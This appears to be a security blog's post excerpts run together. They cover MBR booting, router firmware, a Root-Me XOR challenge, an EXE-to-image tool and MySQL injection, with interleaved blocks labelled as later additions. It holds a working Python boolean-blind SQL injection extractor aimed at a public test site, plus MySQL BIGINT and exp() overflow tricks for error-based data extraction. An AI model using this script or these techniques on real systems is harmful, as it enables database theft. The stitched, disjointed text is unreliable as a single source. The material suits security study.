This is an old vulnerability I found in Informatica that got fixed recently. Honestly, I’ve been a bit away from bug hunting due to studies and all. Well, stay tuned, I found some cool bugs in a few sites and products. Will disclose shortly 🙂
A bootloader is a special program that is executed each time a bootable device is initialized by the computer during power-on or reset; its job is to load the kernel image into memory. This program sits very close to the hardware and to the architecture of the CPU. All x86 PCs boot in Real Mode, and in this mode only 16-bit instructions are available. Our bootloader therefore runs in Real Mode and is a 16-bit program.
https://manybutfinite.com/img/boot/bootProcess.png
When you switch on the PC, the BIOS wants to boot an OS, which must be found somewhere on a hard disk, floppy disk, CD, etc. The order in which the BIOS searches for an OS is user-configurable. Next, the BIOS reads the first 512-byte sector of the bootable disk (a sector is usually 512 bytes in size). This sector is known as the Master Boot Record (MBR). The BIOS simply loads the contents of the MBR into memory at location 0x7c00 and jumps to that location to start executing whatever code is in the MBR. Our bootloader should therefore be 512 bytes in size as well.
https://manybutfinite.com/img/boot/masterBootRecord.png
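A defensive counterpart to the description above, added here and not part of the original post: a parser that checks whether a 512-byte image has the structure the BIOS expects before treating it as an MBR. It assumes the classic layout (446 bytes of boot code, a four-entry partition table at offset 446, the 0x55 0xAA signature at offset 510); the sample sector is constructed.

```python
# Added example, not from the original post: parse and sanity-check a
# 512-byte MBR image like the one the BIOS copies to 0x7c00. The layout
# assumed is the classic MBR: 446 bytes of boot code, a 64-byte partition
# table (four 16-byte entries) at offset 446 and the 0x55 0xAA signature
# at offset 510. The sample sector below is constructed for the example.
import struct

SECTOR_SIZE = 512
TABLE_OFFSET = 446
SIGNATURE = b"\x55\xaa"
# status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
ENTRY = "<B3xB3xII"

def parse_mbr(sector):
    """Return boot code and used partition entries; raise ValueError if
    the sector is not something the BIOS would accept as an MBR."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE} bytes, got {len(sector)}")
    if sector[510:512] != SIGNATURE:
        raise ValueError("missing 0x55AA signature; BIOS will not boot this sector")
    partitions = []
    for slot in range(4):
        start = TABLE_OFFSET + 16 * slot
        status, ptype, lba, count = struct.unpack(ENTRY, sector[start:start + 16])
        if ptype == 0:                         # unused slot
            continue
        partitions.append({"slot": slot, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba, "sectors": count})
    return {"boot_code": sector[:TABLE_OFFSET], "partitions": partitions}

def make_mbr(boot_code, partitions):
    """Constructed fixture: build an MBR from boot code and
    (status, type, lba_start, sectors) tuples."""
    if len(boot_code) > TABLE_OFFSET or len(partitions) > 4:
        raise ValueError("boot code must fit in 446 bytes; only 4 partition slots")
    table = b"".join(struct.pack(ENTRY, *p) for p in partitions)
    return boot_code.ljust(TABLE_OFFSET, b"\x00") + table.ljust(64, b"\x00") + SIGNATURE

# "jmp $" (EB FE): a two-byte real-mode stub that loops forever, the classic
# placeholder boot code for a sector that only carries a partition table.
SAMPLE_MBR = make_mbr(b"\xeb\xfe", [(0x80, 0x83, 2048, 204800)])
```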
Warning: The author takes no responsibility for any damage you may cause to your device. This post is meant for educational purposes and strictly NOT for malicious purposes.
This post is all about modifying your existing router firmware to perform cool things.
Hardware and Tools Needed:
For the router, I am using a TP-Link MR3020. You may use whatever router you like, but make sure you won’t brick your device while or after uploading the modified firmware. Also make sure your firmware can be reversed and dumped using the FMK (Firmware Mod Kit).
Download Firmware Mod Kit
Here’s a cool challenge by Ryscrow of Root-Me. The challenge says:
For this challenge you will need to decipher a simple XORed picture. This BMP picture was mistakenly encrypted. Can you recover it?
The file name is “ch3.bmp”; let’s open it in a hex editor and see. I first inspected the first 20 bytes, and we can see a string saying “fallen”. Actually, I guessed this key of length 6.
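Why the key shows up in the first bytes, as an added example that is not part of the original post: a BMP header has positions whose plaintext is fixed (the "BM" signature, the four reserved zero bytes, the pixel-data offset), so XORing those positions against the ciphertext returns the key bytes directly. The key "fallen" and the tiny image are constructed here; the 6-byte key length is the one guessed above.

```python
# Added example, not from the original post: recover a repeating-key XOR
# from an encrypted BMP using the header bytes every BMP shares, then
# decrypt. The key "fallen" and the tiny image are constructed here.
import struct

def make_bmp(width, height, rgb):
    """Build a minimal uncompressed 24-bit BMP (constructed test input)."""
    row = bytes(rgb) * width
    row += b"\x00" * ((4 - len(row) % 4) % 4)      # rows are padded to 4 bytes
    pixels = row * height
    # 14-byte file header: "BM", file size, two reserved words, pixel offset
    header = b"BM" + struct.pack("<IHHI", 54 + len(pixels), 0, 0, 54)
    # 40-byte BITMAPINFOHEADER
    info = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                       len(pixels), 2835, 2835, 0, 0)
    return header + info + pixels

def xor_repeat(data, key):
    """XOR with a repeating key; encryption and decryption are the same op."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Header bytes that are predictable without knowing the image: the "BM"
# signature, the four reserved bytes (always zero) and the pixel-data
# offset, which is 54 for a plain BITMAPINFOHEADER file.
KNOWN_HEADER = {0: ord("B"), 1: ord("M"), 6: 0, 7: 0, 8: 0, 9: 0,
                10: 54, 11: 0, 12: 0, 13: 0}

def recover_key(cipher, key_len):
    """Known-plaintext recovery: C[i] ^ P[i] = K[i % key_len]. Returns None
    if known bytes disagree (wrong length) or leave a key byte undetermined."""
    key = [None] * key_len
    for pos, plain in KNOWN_HEADER.items():
        k = cipher[pos] ^ plain
        if key[pos % key_len] not in (None, k):
            return None
        key[pos % key_len] = k
    return None if None in key else bytes(key)

def decrypt_bmp(cipher, key_len):
    """Recover the key from the header and return (key, plaintext BMP)."""
    key = recover_key(cipher, key_len)
    if key is None:
        raise ValueError(f"header does not determine a {key_len}-byte key")
    plain = xor_repeat(cipher, key)
    if plain[:2] != b"BM":
        raise ValueError("decrypted data is not a BMP")
    return key, plain
```

The reserved bytes at offsets 6 to 9 are zero in every BMP, so in the ciphertext they are the first four key bytes verbatim; that is the visible fragment a hex editor shows.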
This is a simple utility to convert EXE files to PNG images and vice versa. It is written using Java 8 and inspired by this article.
Putty.exe converted to an image using green pixels.
Download:
https://github.com/OsandaMalith/Exe2Image/releases
This tool was added to PentestBox : https://modules.pentestbox.com/#forensics
Softpedia:
http://www.softpedia.com/get/Security/Encrypting/EXE-to-Image-Converter.shtml
Other Shares:
http://www.kitploit.com/2017/09/exe2image-simple-utility-to-convert-exe.html
There are lots of tools available for blind injection, but when it comes to customizing payloads and bypassing WAFs, I thought of writing my own program to extract data based on true and false boolean conditions.
This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py
[code language="python"]
import re
import urllib.parse
import urllib.request
# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/

url = 'http://testphp.vulnweb.com/artists.php?artist=2'  # target
payload = '(select user())'  # your payload
trueString = 'Blad3'  # text or HTML that appears only in the true condition
maxLength = 20
result = ''

for i in range(1, maxLength + 1):
    found = False
    for j in range(32, 127):
        # MySQL string comparison is case-insensitive by default, so the
        # uppercase candidates would only duplicate the lowercase hits
        if chr(j).isupper():
            continue
        sql = ' and substring(' + payload + ',' + str(i) + ',1)=' + hex(j) + '-- -'
        target = url + urllib.parse.quote(sql)  # percent-encode spaces and parentheses
        req = urllib.request.Request(target)
        # If cookies are needed:
        # req.add_header('Cookie', 'value=1;value=2')
        html = urllib.request.urlopen(req).read().decode('utf-8', errors='ignore')
        if trueString in html:
            print('Found: ' + chr(j))
            result += chr(j)
            found = True
            break  # one character per position; move on to the next
    if not found:
        break  # no candidate matched: the string has ended
print(result)
[/code]
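Seen from the defender's side, as an added example that is not the tool's code: detection logic that flags this kind of probing in web access logs, keyed on the request shape the script sends (` and substring(<expr>,<pos>,1)=0x<hh>-- -`). The log lines are constructed, and the Combined Log Format layout is assumed.

```python
# Added example, not from the original post: detect boolean-based blind
# probing of the shape the script above sends in access logs. Each
# extracted character costs the tool up to ~95 requests that differ only in
# the position and hex byte, so one client hitting one path with many
# distinct positions is the signal. Log lines are constructed (Combined Log Format).
import re
from collections import defaultdict
from urllib.parse import unquote_plus

PROBE_RE = re.compile(r"and\s+substring\(.+?,\s*(\d+)\s*,\s*1\s*\)\s*=\s*0x([0-9a-f]{2})", re.I)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def find_probes(lines):
    """Map (client_ip, path) -> set of string positions probed."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        path, _, query = target.partition("?")
        probe = PROBE_RE.search(unquote_plus(query))   # decode %20, %28 ... before matching
        if probe:
            hits[(ip, path)].add(int(probe.group(1)))
    return hits

def flag_clients(lines, min_positions=3):
    """Clients that probed at least min_positions distinct positions of one path."""
    return sorted(k for k, pos in find_probes(lines).items() if len(pos) >= min_positions)

SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2015:13:55:36 +0000] "GET /artists.php?artist=2%20and%20substring((select%20user()),1,1)=0x61--%20- HTTP/1.1" 200 5123',
    '203.0.113.7 - - [10/Oct/2015:13:55:36 +0000] "GET /artists.php?artist=2%20and%20substring((select%20user()),1,1)=0x62--%20- HTTP/1.1" 200 4870',
    '203.0.113.7 - - [10/Oct/2015:13:55:37 +0000] "GET /artists.php?artist=2%20and%20substring((select%20user()),2,1)=0x63--%20- HTTP/1.1" 200 5123',
    '203.0.113.7 - - [10/Oct/2015:13:55:38 +0000] "GET /artists.php?artist=2%20and%20substring((select%20user()),3,1)=0x75--%20- HTTP/1.1" 200 5123',
    '198.51.100.3 - - [10/Oct/2015:13:56:01 +0000] "GET /artists.php?artist=2 HTTP/1.1" 200 5123',
]
```

Response size is a useful second signal here: the true and false branches return pages of different length, as the 5123 versus 4870 bytes in the constructed lines suggest.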
This is another overflow that I found, this time in MySQL's DOUBLE data type. You can refer to my previous post on BIGINT overflow error-based injections if you want to understand how overflows are exploited to extract data; the queries here are similar to those in that post. Looking at the functions in MySQL, I was interested in the mathematical ones. They too must use some data type to hold their values, so I went on testing for functions that would cause overflow errors and found that exp() causes an overflow error when passed a value above 709.
mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
exp() is the inverse of MySQL's ln() and log() functions. Briefly, ln() and log() (with a single argument) both return the natural logarithm, i.e. the logarithm to the base e, where \(e \approx 2.71828183\).
\(\ln(15) = \log_{e}(15) = 2.70805020110221\)
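Why the boundary falls between 709 and 710, as an added derivation from the values above (the largest finite DOUBLE is IEEE 754 \(\mathrm{DBL\_MAX} \approx 1.7977 \times 10^{308}\)):

\(\exp(x) \le \mathrm{DBL\_MAX} \iff x \le \ln(\mathrm{DBL\_MAX}) \approx 709.78\)

\(\exp(709) \approx 8.2184 \times 10^{307} < \mathrm{DBL\_MAX}\), while \(\exp(710) = e \cdot \exp(709) \approx 2.2340 \times 10^{308} > \mathrm{DBL\_MAX}\), so 709 is the largest integer argument that still fits and 710 raises ERROR 1690.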
I recently entered the world of mobile security and pen-testing. I wanted to install GCC on a jailbroken iOS 8.3 device and faced lots of issues finding the correct package for it. Somehow I managed to install it and run my own C apps 🙂 I thought of sharing this with you; if you are struggling like me, here’s how I managed to install it.
First install OpenSSH and essential commands like apt-get, sed, ps, etc. After that you have to install a few Debian packages along with gcc. Download this zip file I made and drop it into any folder on your iPhone using an SFTP connection or a desktop file browser. After that, install all the packages in it.
[code language="bash"]
$ dpkg -i *.deb
[/code]
I was interested in finding new techniques for extracting data via MySQL errors. This is a detailed write-up that will help you understand how I built these queries. Looking at how MySQL handles integers, I was interested in causing overflows. This is how MySQL stores integers:
(Source: http://dev.mysql.com/doc/refman/5.5/en/integer-types.html)
These overflow errors occur only in MySQL versions 5.5.5 and above. In earlier versions an integer overflow results in a silent wraparound.
The BIGINT data type is 8 bytes in size, which means it is 64 bits wide. The maximum signed value of a BIGINT is “0b0111111111111111111111111111111111111111111111111111111111111111” in binary, “0x7fffffffffffffff” in hex and “9223372036854775807” in decimal. Evaluating a numerical expression on this value, such as adding to it, causes a “BIGINT value is out of range” error.
mysql> select 9223372036854775807+1;
ERROR 1690 (22003): BIGINT value is out of range in '(9223372036854775807 + 1)'